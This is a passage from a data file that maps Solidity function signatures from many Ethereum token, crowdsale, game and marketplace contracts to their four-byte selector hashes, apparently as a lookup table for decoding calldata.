"addSuperPlayer(address,bytes32,uint8)": "0x6a19b647", "SettleBond(uint256)": "0x7dec4ce8", "Extend(uint256,uint256)": "0x16b0cc2d", "Judgement(uint256,uint256,uint256)": "0xbf955038", "Approve(uint256)": "0x77b92c07", "Dispute(uint256)": "0x78e89085", "Appoint(uint256,address)": "0xcd4c04c6", "BeneficiaryStake(uint256)": "0xdeb53ab4", "ChangeExtension(uint256,bool)": "0x9bc6b571", "WriteBond(uint256,address,address)": "0xf97d8aee", "Percent(uint256,uint256)": "0xc110afe2", "Register(address,bool)": "0xe5893cbe", "SetUp(uint256,uint256,uint256,address)": "0x7fc7e643", "getCardValue(uint256)": "0x2e78f9a7", "sideBetPayToken(bytes32)": "0x048957d8", "sideBetPay(bytes32)": "0xc44e787f", "payToken(address,uint256)": "0x10510ec1", "parseResult(bytes32,string,address)": "0x468a0413", "playWar(uint256)": "0xd02cc69f", "setSideBetPercentage(uint256)": "0x16a54085", "setBetMinMax(uint256,uint256)": "0xb1648152", "SetTestModeHands(uint256,uint256)": "0xb46631cd", "ToggleTestMode(bool)": "0xb2f3319e", "setWinLossAmount(uint256,uint256)": "0x778317c4", "getTokenLossValue(uint256)": "0x65e807ab", "getTokenWinValue(uint256)": "0x5b5e760c", "remainingTokens(address)": "0x236f86a1", "EAACoin()": "0x10f85f44", "EthRoi()": "0x18b7bb11", "AOABANK()": "0xba6a7e27", "HNContract()": "0xf5143b1c", "setTimeLock(address,uint256)": "0x644fab74", "liantoken()": "0x8720bb42", "GoodfieldNewRetail(uint256,string,string)": "0xdf57904a", "isOnTrading(uint256)": "0x677f768d", "getLendingItemInfo(address,uint256)": "0xad4e39f3", "getLendingItemLength(address)": "0xc7343754", "getBorrowingItemByObjId(uint64)": "0x4f99a96e", "getBorrowingItem(uint256)": "0xfaa5369d", "getSellingItemByObjId(uint64)": "0x0e5aaffc", "getSellingItem(uint256)": "0x8426a452", "getObjInfoWithBp(uint64)": "0xf9a3e07d", "getBackLendingItem(uint64)": "0x4eb4fe80", "borrowItem(uint256)": "0xee422f13", "removeBorrowingOfferItem(uint256)": "0x2f6dc6b3", "offerBorrowingItem(uint256,uint256,uint256)": "0x27e90a7e", "removeSellOrder(uint256)": "0x0559c114", "_triggerNFTEvent(address,address,uint256)": "0x951f4a6e", "updateConfig(uint16)": "0x98cdf0ca", "setContract(address,address,address,address)": "0x615dbebb", "EtheremonTrade(address,address,address,address)": "0x606a1f7a", "OCTACryptoToken()": "0xcc9425b7", "subdomainOwner(string,string)": "0xb0698763", "domainOwner(string)": "0x18d95092", "DigitalPesoCoin()": "0x0a811fcc", "bwin()": "0xd385fac9", "addData(bytes32[],bytes32,bytes32,bytes32,uint256,uint256,uint256,uint256)": "0xb8f2954d", "getItemByTokenID(uint256)": "0xa37f00f7", "getTokenIDRelateWithTx(bytes32)": "0xea650378", "Bitcan()": "0x107d4b23", "ECOToken()": "0x1d5de3fb", "LLG(uint256,string,string)": "0x089854fe", "sub2(uint256,uint256)": "0xebd58975", "sub1(uint256,uint256)": "0x211b72a3", "getEmergencyTransferSigner(address,uint256)": "0xd047a0d0", "getEmergencyTransferSignersCount(address)": "0xdea90acf", "getJobPayments(bytes32)": "0xafcfad6e", "getJob(bytes32)": "0xf729cf0d", "cancelJobByAdmin(bytes32,uint256,address,uint256)": "0x41defd82", "cancelJobByProvider(bytes32)": "0x6e6bfca0", "completeJob(bytes32)": "0x991e0139", "createJob(bytes32,address,address,uint256)": "0xe7acaa1e", "removeUser()": "0xf944f4c7", "removeBoardOnUser(address,address)": "0x55c39193", "addBoardOnUser(address,address)": "0x635ca669", "editUser(bytes32,bytes32,bytes32,bytes10,bytes32,bytes32,bytes32)": "0xec3adf65", "createUser(bytes32)": "0xabf7bfd8", "getBoardInfo(address,address)": "0xc1b668a9", "createBoard(bytes32)": "0xf755a76e", "getIndexInfo()": "0xb2bb72bf", "OpenContentIndex()": "0x17ba86af", "getProfile()": "0xd6afc9b1", "getUsername()": "0x681f3e6d", "addPostOnUser(address,address)": "0xf01e341b", "removeBoard(address,address)": "0x1a5d60bd", "getBoard(uint256)": "0x45e09e54", "addBoard(address,address)": "0xb716e3f2", "edit(address,bytes32,bytes32,bytes32,bytes10,bytes32,bytes32,bytes32)": "0xe8a481bd", "User(address,bytes32)": "0x2110a57c", "removeUser(address,address)": "0x22928d6b", "addUser(address,address)": "0x8ca3b448", "removePost(address,address)": "0x6b56476b", "addPostOnBoard(address,address,address)": "0x2779ea96", "getPost(uint256)": "0x40731c24", "Board(address,bytes32)": "0xb60ad98d", "giveDown(address,address)": "0x00fece08", "giveUp(address,address)": "0xc14958cb", "addComment(address,uint256,bytes32,bytes32,bytes32)": "0xee4d9402", "getBoard()": "0x3264a34b", "getContent()": "0x59016c79", "setIds(uint256,uint256)": "0x8628aca9", "Post(address,address,address,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32)": "0xd1ef752d", "Exercise(uint256,uint256)": "0x0084fe51", "Respond(address,uint256)": "0x4924d397", "CallOption(address,uint256,uint256,uint256,uint256,uint256)": "0x8744e974", "MultiValidator()": "0xff6a6df7", "storeProductReference(address)": "0x805593db", "addHandler(address,address,string,string)": "0xdfe525a2", "Database()": "0x533265e6", "qtdePokemonsMapping(address)": "0x1537671c", "qtdePokemons(address)": "0x22fbde38", "listPokemons(address)": "0xe9f90fe6", "delPokemonFromMaster(address,uint256)": "0x15fbba7a", "addPokemonToMaster(address,uint256)": "0x1f1953ad", "newPokemonMaster(address)": "0xcf19463d", "updatePokemon(uint256,uint256,uint256)": "0xb469ba24", "newPokemon(uint256,uint256,uint256)": "0xbea5f9cd", "PokeCentral()": "0x2c2aa66c", "PokeCentral(address,address)": "0x1802f969", "airdrop(address[],uint256[])": "0x67243482", "PapyrusAirdrop(address)": "0x8ab4d1ca", "abi()": "0x48870630", "create(address,address,address)": "0x9c041ebd", "payedAmount()": "0xf6150d17", "buyValue()": "0x98e76e06", "setCost(uint256)": "0x44a0d68a", "ValueOwners()": "0xe06309bb", "onERC721Received(address,address,uint256,bytes)": "0x150b7a02", "ERC721ReceiverMock(bytes4,bool)": "0xc141e6da", "DetailedERC20Mock(string,string,uint8)": "0xbd189666", "verifyPreSupport(uint256)": "0xaabe00c4", "unVoteAll()": "0x3bf53a89", "unVote(uint256)": "0x9fd6adb3", "newProposal(address,uint256,string,bytes,uint64)": "0xb988c505", "increment(int256)": "0xc03c3003", "Incrementer2()": "0x89f03ebc", "add(uint16,uint16)": "0x4881ae73", "sub(uint16,uint16)": "0x6d23cda3", "div(uint16,uint16)": "0x64802918", "mul(uint16,uint16)": "0xba9ac37f", "add(uint32,uint32)": "0x3ad14af3", "sub(uint32,uint32)": "0xc6440b3e", "div(uint32,uint32)": "0xcaa8e084", "mul(uint32,uint32)": "0x5b113414", "SingleAccountRules(address)": "0x616a6371", "TwoFactorAuth(string,string)": "0xbadf8b37", "participate(bytes1[64])": "0xfd906ec9", "Witness()": "0x056cf6bf", "call(address,bytes)": "0x1b8b921d", "showMessage(bytes32,uint256,string)": "0x6e2e2e4d", "vote(address,uint256,uint256,string)": "0x39c7967d", "not()": "0x2e13bd10", "setSize(uint256)": "0x170ab405", "getPayoutNumerator(uint256)": "0xda834ac4", "isDisavowed()": "0x64020842", "isInvalid()": "0x04be2f50", "redeem(address)": "0x95a2251f", "liquidateLosing()": "0x22b152a3", "getPayoutDistributionHash()": "0xdd62f6f3", "setPayoutDistributionHash(bytes32)": "0x68a59805", "setPayoutNumeratorsValue(uint256[])": "0xfde440bb", "disavow()": "0x20b023c8", "contribute(address,uint256)": "0x8418cd99", "getContributeAmount()": "0x83aa4958", "getContributeParticipant()": "0x45bae539", "contributeWasCalled()": "0xf1b5c777", "TrueFlipICO(address,address,address,address,address,uint256)": "0x9ffd1c10", "setTeamAddress(address)": "0x6690864e", "incrementCounters(uint256,uint256)": "0x0c2737d2", "investment(uint256,address,string,uint256)": "0x3f572432", "doInvestment(uint256,address,string,uint256,bool)": "0x33c023ef", "calculateTokens(uint256)": "0x71aa60fd", "EntrepreneurShop()": "0xafab729d", "surplus()": "0x13888565", "transfer_opt(address,address,uint256)": "0x36c9c62d", "userTransfer(address,address,uint256)": "0x1047456e", "WhiteTigerToken()": "0x6caca63a", "purchase(uint256,uint256,uint256,address,bytes)": "0x15ca65f0", "put_purchase_for(uint256,address,address,uint256,uint256,uint256,address,bytes)": "0x896ca3f4", "useItems(uint32,uint256,address,uint256)": "0xe22fcd08", "reduceCD(uint256,uint256)": "0xb37139e6", "setNewCdFee(uint128)": "0xa56b3d11", "getHero(uint256)": "0x21d80111", "HeroCore()": "0xf4cebdc2", "createGen0Auction(uint256,uint256)": "0xfd01249c", "createPromoHero(uint256,address)": "0xa48de68b", "promoBun(address,address)": "0x3c6677d6", "orderOnFightAuction(uint256,uint256,uint256)": "0x1a437780", "createFightAuction(uint256,uint256,uint256,uint256)": "0x07120872", "orderOnSaleAuction(uint256,uint256)": "0x55f03816", "createSaleAuction(uint256,uint256,uint256,uint256,uint256,uint256)": "0x59179dbd", "setFightAuctionAddress(address,address)": "0x9217500c", "getCurrentPrice(uint256,uint8)": "0xc982e353", "createAuction(uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x2b549b82", "order(uint256,uint256,address)": "0xf4accda5", "reduceCDFee(uint256)": "0xab9af166", "_fight(uint32,uint32)": "0x2a666e01", "isReadyToFight(uint256)": "0xedc11a11", "setMasterRecruitmentAddress(address,address)": "0x9ebca4ad", "fightMix(uint256,uint256)": "0x0bb536a2", "isMasterRecruitment()": "0x1bd2b37c", "rescueLostHero(uint256,address)": "0x7e9cd30c", "setMagicStore(address,address)": "0x6bdcdeaa", "_createHero(uint256,uint256,uint256,uint256,address)": "0xb14ec275", "withdrawOtherERC20Balance(uint256,address,address)": "0xae4d503b", "withdrawERC20Balance(uint256)": "0xaddf0813", "charge(uint256)": "0xe457e1e5", "setERC20TotalPromo(uint256,uint256)": "0x57f5abe5", "setERC20Address(address,address,uint256,uint256)": "0xb35861b4", "setOPM(address)": "0x63a1512e", "setLeader(address)": "0x4331e8dd", "NDEX()": "0xdc0527de", "acupuncturecoin(uint256,string,string)": "0x82f78260", "INMCOIN()": "0x4031f60d", "Nikone()": "0x2d41c7a4", "ToniToken()": "0xebc26c95", "DaoCasinoToken()": "0x269b0737", "nasdaqo(uint256,string,string)": "0xbffcd758", "EliteShipperToken(uint256,string,string)": "0x86c23d54", "mint(address,uint256,int256)": "0xf6030aeb", "ERC20(string,string,uint256)": "0xfddb4683", "approved(address,uint256,address,bytes)": "0xc4a5b138", "AirDropToken()": "0x25b89c52", "ELBT()": "0xa5f4864d", "Qbase()": "0xd6a039f0", "Permian()": "0x520ce36a", "safeSend(uint256)": "0xc3f7f169", "extraDiscount(uint256)": "0x06caf3e6", "extraRate(uint256,uint256)": "0x9ee7fbd9", "isTokenSale()": "0x7768dec0", "sellManually(address,uint256)": "0xbf2095a4", "setupFinal(uint256)": "0x3ce9d22e", "setupTokenRate(uint256)": "0x6bce23be", "MBEToken(address,address,address)": "0x169dc72c", "get_data_owner(address,address,string)": "0x23f5c64f", "get_data_benefited(address,string)": "0xf33d9a52", "edit_safe(address,string,string)": "0x96bd09a1", "create_safe(address,string,string)": "0x5919978b", "_create_user(address,address)": "0x95bda742", "get_status_user(address,address)": "0x4b76cb13", "set_active_contract()": "0x20ed9451", "set_status_user(address,address,bool,bool)": "0xc5b2333c", "_my_transfer(address,address,uint8)": "0xe93680d5", "set_prices(uint8,uint8,uint8)": "0x85c64029", "SafeBox()": "0x700ef803", "SafeCoin()": "0x582cca06", "mintTokens(address,address,uint256)": "0x6fc98ee1", "tokenOwnerRemove(address)": "0x38f88ee0", "tokenOwnerAdd(address)": "0x169e2633", "tokenHolder(uint256)": "0x862a4bf2", "tokenHolderCount()": "0xd13e5846", "SmartInvestmentFundToken(address,address)": "0x97990635", "abandonedFundWithdrawal()": "0x35213a69", "abandon(string)": "0xce1c93af", "setSiftContractAddress(address)": "0x43e1eb82", "IcoPhaseManagement(address)": "0x25d78d3b", "PCNCoin()": "0xd112cf30", "FujintoToken(uint256,string,uint8,string)": "0xd01c0904", "SpecialDrawingRight()": "0xbaa23ac1", "foxcoin(uint256,string,string)": "0x2d91bf11", "ORACON(uint256,uint256)": "0xdfc2a146", "estimate(uint256)": "0x9c792938", "ClipperCoin(uint256,string,uint8,string)": "0x116fe01b", "setWhiteListAddress(address)": "0x27bbea3a", "canTransfer(address,address)": "0x6c85cf67", "makeOldFucks(uint32)": "0xb535c741", "giveBlockReward()": "0xfcd6e339", "adjustFlame(uint256)": "0x852c5662", "setSellPrice()": "0x050d6a15", "PirateNinjaCoin(string,uint8,string,uint256,uint256)": "0xff70bd9c", "SUNToken()": "0xa414b00d", "SPTOKEN()": "0x1728ac68", "mintCount()": "0x9659867e", "DEFAULT_GAME_COST()": "0x7abbe9c0", "currentBanker()": "0x8a27a31c", "getIsActive()": "0xfba7cc79", "SALES_END()": "0xb621bd15", "fundPool()": "0x70f37d27", "weiPerEth()": "0x6c530ee3", "yearTwoClaimed()": "0x3c9046c9", "isOpenDistributionClosed()": "0xbe7b4858", "offChainAddresesValidCount()": "0xdac9882a", "priceExpirationInterval()": "0xab2ebcf1", "soldForForth()": "0x5545f584", "latestVersion()": "0xc07f47d4", "getAddressLevel()": "0x1b3c72aa", "currentLoanAmount()": "0x80adede0", "checkIfMissionCompleted()": "0xfd074e8e", "isTimeVault()": "0x89c1108d", "crowdsaleEndsAt()": "0x4cd9c3e4", "prvdWallet()": "0x9382ef65", "MILLION()": "0x32bc934c", "COLOR_GREEN()": "0x125385f2", "whaleMax()": "0xb8314c22", "maxRentPeriod()": "0x508335e6", "sysFeePermillage()": "0x454bf426", "intrepidSoldCount()": "0x0ec6688d", "JULIAN_ADDRESS()": "0xac2e2c65", "finalLoser()": "0x16d05042", "unscannedCaps()": "0x6fbf466c", "birthPerHundred()": "0xda658f22", "multi()": "0x1b8f5d50", "endPresaleDate()": "0x547173da", "previousDistribution()": "0x32ef8dfa", "preSaleStartBlock()": "0xf9dfb361", "presaleFemaleTokensLimit()": "0x8243a036", "totalItem()": "0xbda4fd89", "TOKEN_FOUNDINGTEAM()": "0x906b23be", "User_1()": "0x691f2216", "fourthExtendedBonusSalesEnds()": "0xc4fce59a", "santaFundWallet()": "0xa8b151fd", "commissionType()": "0xade05b35", "foundersTokensPercent()": "0x86d0b46d", "TotalpresaleSupply()": "0x9d20b314", "ETHUSDPRICE()": "0x4d1c43b2", "gasLimitForOraclize()": "0x1ab30817", "RATE_SALESTAGE6()": "0xde459c9b", "lastJackpotRound()": "0xf7066121", "novaCoinAddress()": "0xd728cc72", "test_assert()": "0x1d2d4c34", "dmlwallet()": "0xbfb1fcf5", "freezeGlobalTansfers()": "0xe63227b0", "jackpotLastPayout()": "0x58541aba", "contractRefundStarted()": "0x5d94e35c", "tokensTotalSupply()": "0x95a08221", "tokenClient()": "0x4fd64591", "feesCollected()": "0xf071db5a", "tokenOpen()": "0x7e87cf30", "maxParticipantCount()": "0xc462a408", "luckyYouToken()": "0xc41518f2", "transactionFeeMin()": "0x3e78cf7a", "bossAdmin()": "0x65c2e8a1", "distributedCount()": "0x45ec26ac", "burnFinished()": "0x2f743591", "FINANCE_CAP_PER_ROUND()": "0x8061d365", "medalDataContract()": "0x01eca37c", "lockTokenHolder()": "0x2bbeac91", "totalBought()": "0x4a91f195", "isReleased()": "0xfa2a8997", "ICO_PHASE3_AMOUNT()": "0xb4538897", "feeAuthority()": "0x31dbd8a5", "teamReserve()": "0x4287f14a", "quater3()": "0xfada4b76", "marketMakerFee()": "0x7d4af159", "MIDGRADE_TYPE3()": "0x0f092c44", "PRESALE_START()": "0xd3364687", "turnOff()": "0xaf10c810", "MIN_ETHER_CONTR()": "0x49441fc3", "getProperty()": "0x07751070", "BuyLevel()": "0xf7a7408b", "TACTICALCRUISER()": "0x2fa8591e", "twentyThirtyAllocation()": "0x9e3df458", "pvt_plmt_remaining_in_Wei()": "0xfd925795", "semanticVersion()": "0x88b9022f", "ownerInitialBalance()": "0xb8df5ce3", "enableInternalLock()": "0x4b0e2c90", "totalCardCount()": "0x5671ec30", "walletCoreTeam()": "0x6a41ade3", "ecoSystemWallet()": "0xfda78599", "thirdWavePrice()": "0x81a238b5", "getPreSaleFund()": "0xbd6e578a", "openCrowdfund()": "0x44fff35c", "TOKEN_FOR_INVESTER()": "0x9e24edca", "decr()": "0xd9f2ac8a", "TOKEN_PUBLIC_SALE_CAP()": "0xc57a4a4d", "rootUTXOMerkleTreeHash()": "0xe6997f6d", "pullAddr()": "0x4af1b8a7", "ETHinvested()": "0x2c1cf78b", "defaultURIStart()": "0xf6ebe41a", "_ONE()": "0x24cb015a", "mainSaleRateP3()": "0xa66ddf43", "numberOfHeroClasses()": "0xc3bf32e3", "buyStar(uint256)": "0x2f1c34ef", "offerStarForSaleToAddress(uint256,uint256,address)": "0xced444bf", "offerStarForSale(uint256,uint256)": "0xa3240455", "starNoLongerForSale(uint256)": "0xa6372087", "transferStar(address,uint256)": "0xe7152a5c", "getStar(uint256)": "0xc5426124", "updateTransactionFeePercentage(uint8)": "0x65d8a20a", "updateClaimFee(uint256)": "0xb20b8403", "updateCSV(string,uint256)": "0x30807e8e", "allInitialOwnersAssigned()": "0x7ecedac9", "setInitialOwners(address[],uint256[],uint256[])": "0x55daf6e6", "setInitialOwner(address,uint256,uint256)": "0xc687ce9d", "StarMarket()": "0x7b8eeb96", "getInvestmentCurrentValue(address)": "0xf7b54065", "withdrawalUser()": "0x3e650c15", "availableForInvestment()": "0x6635e511", "blackListCompanies()": "0xc71c3f05", "blackListSectorExists(uint8[])": "0xc3e58eec", "clearBlacklistMapping()": "0xc2ca058d", "sendBuyAgent(int256,int256,int256,int256)": "0x5ebcaf7e", "withdrawBuyAgent()": "0xac1cb329", "investOffer(uint256,uint8[])": "0x9e86fb86", "createInvestment(uint8[])": "0x5269660c", "setBuyAgent(address)": "0x8c2962b9", "setInvestAgent(address)": "0x9d4ab2a3", "HedgeContract1(uint256,address,address)": "0xec40db16", "BaseAuction()": "0x41ea5127", "collectPayout(address)": "0x3c671e53", "payOutJob(address,bytes32)": "0x166d3bbf", "updateJobRate(bytes32,uint256)": "0x50bda77e", "addJob(bytes32,uint256)": "0x7446ce1c", "recievePayment(address)": "0x817f0023", "CoolICOToken()": "0x4b21433a", "testEmptyCart()": "0x789c6740", "testCheckoutCart()": "0xb63423a3", "testRemoveProductFromCart()": "0x8f1fc6bb", "testInsertMultipleProductsIntoCart()": "0x1c09c194", "testInsertProductIntoCart()": "0xb1b2aef3", "testReturnsProductInformation()": "0x40f29da3", "testDeregisterCustomer()": "0x79a4ee93", "testRegisterCustomer()": "0xba286ee3", "testDeregisterProduct()": "0xa40668f5", "testRegisterProduct()": "0x6511a98b", "testStoreBalanceAfterCheckout()": "0x3fed491f", "testTransferOwnership()": "0x8522ac8c", "testRenameStore()": "0xd5102704", "getPayoutNumerator(uint8)": "0x1f9ef7fa", "migrateLosingTokenRepToWinningToken()": "0xd625c654", "migrateLosingTokens()": "0x4aec4677", "redeemWinningTokens()": "0x43f29372", "redeemForkedTokens()": "0x9e654dfa", "redeemDisavowedTokens(address)": "0xe37c6cf8", "setRestartGamePeriod(uint256,string)": "0x1e6efc83", "getContractOwner()": "0x442890d5", "changeContractOwner(address,string)": "0xd31ff13c", "setCrowdsalePrice(uint256,string)": "0x011b1a7b", "getIsLimited()": "0xef4787a1", "setIsLimited(bool,string)": "0x9d6bf036", "setGameStatus(bool,string)": "0xa53c7b45", "getCrowdsalePrice()": "0xf8e1badd", "getLimitMaxCrowdsale()": "0x959f601e", "setLimitGame(uint256,string)": "0xc3a9be6b", "getLimitMaxGame()": "0x0297abe5", "setLimitMaxCrowdsale(uint256,string)": "0xe5002347", "getMaxCap10X()": "0x6d121b91", "setMaxCap10X(uint256,string)": "0x79d95c5a", "setPlayPrice(uint256,string)": "0x9dd409d3", "lastDecimal(uint256)": "0x86e92957", "lastCharNoZero(string)": "0xed032ad2", "lastChar(string)": "0x8f217d6b", "stringToBytes(string,string)": "0xaea01c49", "destroyContract(string)": "0xd5c2e3ca", "switchToCrowdsale(string)": "0x7e67429f", "switchToGame(string)": "0xcc6ec39a", "takeToken(address,uint256,string)": "0xe014a83f", "giveToken(address,uint256,string)": "0x7d661e3c", "subTokens(uint256,string)": "0x2a741385", "addTokens(uint256,string)": "0x1f9d7ab8", "addEth()": "0xc2ac3aff", "updateStatus()": "0x5f60f485", "updateStatusInternal()": "0xa3b2938d", "sendEthBack(uint256)": "0x1558ab7e", "sendEth(uint256)": "0xcfc54848", "resetInternal(uint256)": "0xc04484fd", "reset(uint256,uint256,uint256,uint256,string)": "0x8e9e697d", "makeTokens()": "0xbe28f5db", "tokenRate()": "0x31711884", "THEWOLF10XToken(uint256,uint256,uint256,uint256,address,address,address,address,string,uint256)": "0x8de0ece7", "getTotalAddresses()": "0x99166f7d", "TokenBase()": "0xc949ba9b", "checkBlacklist(address)": "0xe6807ca9", "setBlacklistInternal(address,bool)": "0x0daf7a8c", "setBlacklist(address,bool,string)": "0x04f14090", "changePassword(string,string)": "0x84a83662", "storePassword(string)": "0xc70cc560", "delegateToken(address,address)": "0x5594e88c", "Dealer(address,address)": "0x83fa2039", "testSetupMultisig()": "0x2dc7a2e5", "testCreateToken()": "0x459a585a", "testCreateAuthority()": "0x28376f05", "owner_MIN_LIMIT()": "0xecda6635", "normalRate()": "0x530d44f4", "isManualTradingAllowed()": "0x5d8e0c2c", "MIN_INVESTEMENT()": "0x6611611c", "withdrawCreator()": "0x9957ad05", "finishTime()": "0x5958611e", "superFeed()": "0x5649efbc", "currentTokenIdNumber()": "0xc4d3926a", "blockedSum()": "0xc1b3e6ab", "allowTotalMintAmount()": "0x0f3f0e42", "priceExpirationBlockNumber()": "0xda548e29", "phaseStart()": "0x49abee50", "TastToken()": "0x0cc2001c", "pullEtherFromContractAfterPreICOPublic()": "0xedc427fc", "exporterReceivedPayment()": "0x60c31544", "startTimeSale1()": "0x468014e1", "tokenFee()": "0x45599136", "loyaltySupply()": "0xa7651147", "totalBuyers()": "0x3abd0136", "PRESALE_LENGTH()": "0x8297b90c", "getMyTickets()": "0xe1d10d85", "BOUNTY_REWARD_SHARE()": "0x19498426", "GOAL()": "0xa1bed0be", "oracleName()": "0x7d11f020", "QUOTE_ASSET()": "0xf06a1e13", "ICO_SHARE()": "0xd1bb8688", "totalReceive()": "0x6c13b5f2", "pregnantZodiacs()": "0xf66f640e", "tokenExchange()": "0x636f6159", "ratePerWeiInPrivateSale()": "0x34cc4b8f", "firstTeamWithdrawal()": "0x12f31b5f", "isReleasedOnce()": "0xf7c68ffb", "app_address()": "0x2dba3614", "TOKEN_FOR_COMUNITY()": "0xab6da028", "BACKUP_TWO()": "0x0d36c02c", "window1TotalSupply()": "0x67d4f541", "twenty_percent_of_amount()": "0x4710411d", "minWeiToPurchase()": "0x66ce5c52", "isOpenForSale()": "0x3aa3f75a", "maximumTokensForForth()": "0xda44e034", "OWNER_CLAWBACK_DATE()": "0x5a4a04a7", "bonusEnds10()": "0xa192fdba", "moderList()": "0xea486cb1", "highest_bidder()": "0xbd9215f4", "myInner2()": "0xbb5b6aa4", "LOW_RANGE_RATE()": "0xea871246", "lastBidBlock()": "0x71974cbe", "totalearners()": "0x624e3b36", "b21TeamTokensAddress()": "0x3396c780", "foundationShare()": "0xf72084b2", "ALLOC_CROWDSALE()": "0x7717403b", "companyVault()": "0x8a77ba1a", "TOTAL_LBTOKEN_SUPPLY()": "0xb38c1504", "working()": "0x9f08a68c", "dividendPercentage()": "0x6bb80d51", "tokensaleStageNow()": "0x119ecb35", "TEAM1()": "0x85666a7c", "obol()": "0xf9d3b4e9", "REGISTRATION_COST()": "0xd54dc5eb", "contractStarted()": "0x333f57b3", "destTokensSgt()": "0xa1a7405a", "borrowerReturnAmount()": "0xa5f2e079", "lifeFactor_iv()": "0x392752b9", "myToken()": "0xb8fcf937", "EGREngravedToken()": "0x65a572dc", "HaraKiri()": "0xf081d9bd", "buildOutAddress()": "0xfbf0f7da", "makeTapTop()": "0xe3dac959", "capICO()": "0x22b4891d", "totalSoldOnICO()": "0x1d9bd2b9", "START_WEEK_4()": "0x0432ff56", "publicEndTime()": "0x2c27e581", "getMyStores()": "0xdca73e6b", "totalDurationInDays()": "0x10103122", "reserveToken()": "0xf4325d67", "bonusAfterPresale()": "0xca84c176", "endIcoPreICO()": "0x7aae42c9", "ENCRYPTION_KEY()": "0x9e140cc8", "saleHardCapReached()": "0x476aa607", "SNT()": "0xc55a02a0", "totalVIP()": "0x407a6727", "MINIMUM_CONTRIBUTION()": "0x8d0bba03", "millLeconteRate()": "0x2936d35c", "destroyedNinjas()": "0x9bf4c5c5", "nameRegistryAddress()": "0x27b7a2f5", "getCoreAddress()": "0x2096b768", "preICOContract()": "0x14f3f491", "blocksPerDay()": "0x4cfea68a", "concludePresale()": "0x86517df4", "bidsCount()": "0x3fbffcef", "ethtotalSupply()": "0xa5edcd9e", "operatorProductCommissionInPerc()": "0x31f53447", "notificationFee()": "0x21484786", "stopRefunds()": "0xea7ceaf7", "jackpotMaxTime()": "0x65d6e6a4", "pendingAddress()": "0x3ac7d6fe", "lastTimeOfNewCredit()": "0x45941a38", "CompanyName()": "0x218fd1c4", "totalTeamWithdrawSupply()": "0xa7502a3f", "_settingsApplied()": "0xddb9769c", "pushTokenId(uint256)": "0x0a6b378c", "setTokenIdByIndex(uint256,uint256)": "0x4a31dee2", "getTokenIdByIndex(uint256)": "0x49f202ff", "getTokenIdsLength()": "0xcc8c3c45", "setOwnedTokensIndex(uint256,uint256)": "0x31d9931f", "getOwnedTokensIndex(uint256)": "0x4267e19c", "decrementOwnedTokensLength(address)": "0x80412042", "pushOwnedToken(address,uint256)": "0x75ce2913", "setOwnedToken(address,uint256,uint256)": "0x1bf8c094", "getOwnedToken(address,uint256)": "0xbab4e3b1", "getOwnedTokensLength(address)": "0x9899276b", "decrementOwnedArea(address,uint256)": "0x2ec90e34", "incrementOwnedArea(address,uint256)": "0xb23b4dd4", "setOwnedArea(address,uint256)": "0x78c38a79", "getOwnedArea(address)": "0xe168a31a", "setTokenApproval(uint256,address)": "0xe23da75a", "getTokenApproval(uint256)": "0xfe4dd8d9", "setTokenOwner(uint256,address)": "0x23eac4bd", "getTokenOwner(uint256)": "0xa5cd761f", "Aqo()": "0x20f71018", "distribute(uint256,uint256,address,uint256)": "0xa9580edd", "buyTickets(uint256)": "0x2f366637", "olty_6()": "0xe228647f", "issueTokens(address[],uint256[])": "0x7c8f76a1", "KitFutureToken()": "0x0f041cef", "ChaoExToken()": "0x80d32dbb", "togglePause()": "0xc4ae3168", "endRaffle()": "0xee095c0e", "Schmeckle()": "0x3a699294", "ProofOfAIDS()": "0x48839789", "IsDistribStarted()": "0x4d9a81d4", "IsDistribRunningFalg_()": "0xaccbdfd0", "SetupDone()": "0xc21bbe56", "DistribFundsReceiverAddress()": "0xbecf917f", "RemainingTokensReceiverAddress()": "0xd21ceba0", "CurrentDistribPublicSupply_()": "0x1d1cc622", "OwnerDistribSupply_()": "0xc52cb003", "MaxDistribPublicSupply_()": "0xd8489a81", "BurnTokens(uint256)": "0x2cd3fd70", "StopDistrib()": "0x18d69faa", "StartDistrib()": "0x2092970f", "SetFreeTokens(uint256)": "0x90c6d1b9", "SetBonus(uint256)": "0x80ea8273", "SetupMultipliers(uint256,uint256,uint256,uint256,uint256)": "0x10eca945", "SetupToken(string,string,uint256,uint256,uint256,address,address,uint256)": "0x74c77b52", "Tablow()": "0x8d8e2ea9", "addToWhiteListMultiple(address[])": "0x9fec8e3b", "addToWhiteList(address)": "0x47ee0394", "TNCN()": "0xe225e588", "calculatePrice(uint256)": "0xae104265", "prolongate()": "0xaa8c5324", "SilentNotaryCrowdsale(address,address,address,uint256)": "0xce9f24dc", "buyout(address,uint256)": "0xeb2f3038", "SilentNotaryToken()": "0x7556c9e9", "getCollectedAmount()": "0xde571e48", "mintToken(uint256,int256)": "0x9ae1c4f8", "withdraw_all()": "0xdd473d2b", "changeIcoStatus(uint8)": "0x11d414af", "setTokenPrice(uint8)": "0x3397d5d5", "setEthRate(uint256)": "0x6f4215b1", "getEthRate()": "0x75b44aea", "sellOffline(address,address,uint256)": "0xe226cdec", "JaxBox()": "0x75d16a1e", "Bourneereum(uint256,string,string)": "0xc7377d80", "isTransferAllowed(address,address,address,address,uint256)": "0xc32ee591", "getApproveRecord(uint256)": "0x7957170b", "contractExchangeRate(address)": "0xc1d6036b", "existingContract(address)": "0x0656dd02", "distributeOwnedTokensFromOtherContracts(address,address,uint256)": "0x53738a4c", "distributeMnyAfterSwap(address,uint256)": "0x913d23e2", "shareStoredTokens(address,uint256)": "0x82629384", "tokenShare(address)": "0xcd80da82", "calculateHeldTokenDistribution()": "0xad150aec", "maintainExternalContractTokenBalance(address,uint256)": "0x721547eb", "changeExchangeAdmin(address)": "0x0545f8ba", "convertTransferredTokensToMny(uint256,address,address,uint256)": "0x10970fbb", "currentTier()": "0xd679677a", "rateInSpecificTier(uint256)": "0x2559e0dd", "balanceInSpecificTier(uint256)": "0xcfa5cfd3", "balanceInTier()": "0xb001134a", "getCirculatingSupply()": "0x2b112e49", "getMineableTokens()": "0x069f5f72", "closeTierAddition()": "0x9f87f419", "addTierRateAndTokens(uint256,uint256,uint256)": "0x180da450", "addExchangePartnerAddressAndRate(address,uint256)": "0x4e2133ba", "allocateTokens(uint256,uint256,address)": "0xd7e5c07d", "populateTierRates()": "0xe6f7ec75", "populateTierTokens()": "0xb9aaaeee", "MNY()": "0x7222fe1e", 